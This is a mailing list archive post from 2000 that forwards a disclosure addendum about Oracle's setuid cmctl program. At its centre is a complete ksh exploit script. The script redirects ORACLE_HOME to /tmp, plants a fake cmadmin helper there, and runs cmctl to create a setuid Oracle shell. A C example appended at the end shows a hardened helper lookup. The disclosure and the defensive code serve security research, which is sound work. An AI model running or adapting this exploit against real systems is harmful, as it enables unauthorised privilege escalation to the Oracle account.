Penetration Testing mailing list archives

[PEN-TEST] Oracle cmctl exploit - addendum for BugTraq ID 170 (fwd)


From: Alfred Huger <ah () SECURITYFOCUS COM>
Date: Thu, 31 Aug 2000 11:13:14 -0700



Hey folks, this came into our Vulnerability Database today - I thought it
might be relevant given our current thread on Oracle/SQL et al.


Alfred Huger
VP of Engineering
SecurityFocus.com

---------- Forwarded message ----------
Date: Thu, 31 Aug 2000 13:58:33 -0400
From: Kevin Wenchel <kevin.wenchel () jhuapl edu>
To: vuldb () securityfocus com
Subject: Oracle cmctl exploit - addendum for BugTraq ID 170

Just an addendum to ID 170 in the Bugtraq database. ID 170 lists several Oracle setuid executables that are "believed to contain security vulnerabilities", although no exploit info is given. Attached is an exploit I created recently for the "cmctl" command.

The Oracle cmctl command trusts the integrity of the ORACLE_HOME and ORA_HOME environment variables. When you run the command "cmctl start cmadmin", cmctl looks under $ORACLE_HOME\bin for an executable called "cmadmin" and runs it. By modifying $ORACLE_HOME you can have all sorts of fun with the Oracle account.

-Kevin

#! /usr/bin/ksh
#############################################
#
# cmctl is installed setuid to Oracle
# by default. See BugTraq ID 170 and Oracle
# bug id 701297 and 714293. 
#
# This script will create a setuid Oracle shell,
# /tmp/.sh
#

# redirect environment variables
export ORACLE_HOME=/tmp
export ORAHOME=/tmp

mkdir /tmp/bin
chmod a+rx /tmp/bin

# create cmadmin script
cat <<EOF > /tmp/bin/cmadmin
cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh
chmod a+rx /tmp/.sh
EOF

chmod a+rx /tmp/bin/cmadmin

# run cmctl to create Oracle setuid shell
/oracle/products/V815/bin/cmctl start cmadmin
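The defect the message describes is a setuid program building the path of a helper it executes from a caller-controlled environment variable. The following is an added example, not code from the message or from Oracle: a small C model of how such a helper lookup should be done, ignoring ORACLE_HOME whenever the process holds privileges the caller did not have, rejecting path traversal in the value otherwise, and checking that the helper's directory is not writable by unprivileged users. The compiled-in home directory is a placeholder assumed from the path in the script above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Placeholder install root (assumption based on the path in the message). */
#define BUILTIN_ORACLE_HOME "/oracle/products/V815"

/* Only an absolute path without ".." components is accepted from the caller. */
static int home_syntax_ok(const char *home)
{
    if (home == NULL || home[0] != '/' || strlen(home) > 200)
        return 0;
    return strstr(home, "..") == NULL;
}

/* The helper's directory must exist, be owned by root or the effective user,
 * and be unwritable by group and others; otherwise anyone could drop a
 * "cmadmin" there, which is exactly what the script above relies on. */
int dir_is_safe(const char *dir)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != 0 && st.st_uid != geteuid())
        return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Build "<home>/bin/cmadmin". When privileged (euid != uid) the caller's
 * ORACLE_HOME is ignored and the compiled-in home is used; when unprivileged
 * a syntactically sane ORACLE_HOME may override it. Returns 1 on success. */
int resolve_helper(char *out, size_t outlen, const char *env_home, int privileged)
{
    const char *home = BUILTIN_ORACLE_HOME;
    if (!privileged && env_home != NULL) {
        if (!home_syntax_ok(env_home))
            return 0;
        home = env_home;
    }
    return snprintf(out, outlen, "%s/bin/cmadmin", home) < (int)outlen;
}

int main(void)
{
    char path[256], dir[256], *slash;
    int privileged = geteuid() != getuid();
    if (!resolve_helper(path, sizeof path, getenv("ORACLE_HOME"), privileged))
        return 1;
    strcpy(dir, path);
    if ((slash = strrchr(dir, '/')) != NULL)
        *slash = '\0';
    printf("helper %s (privileged=%d, dir safe=%d)\n", path, privileged, dir_is_safe(dir));
    return 0;
}
```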
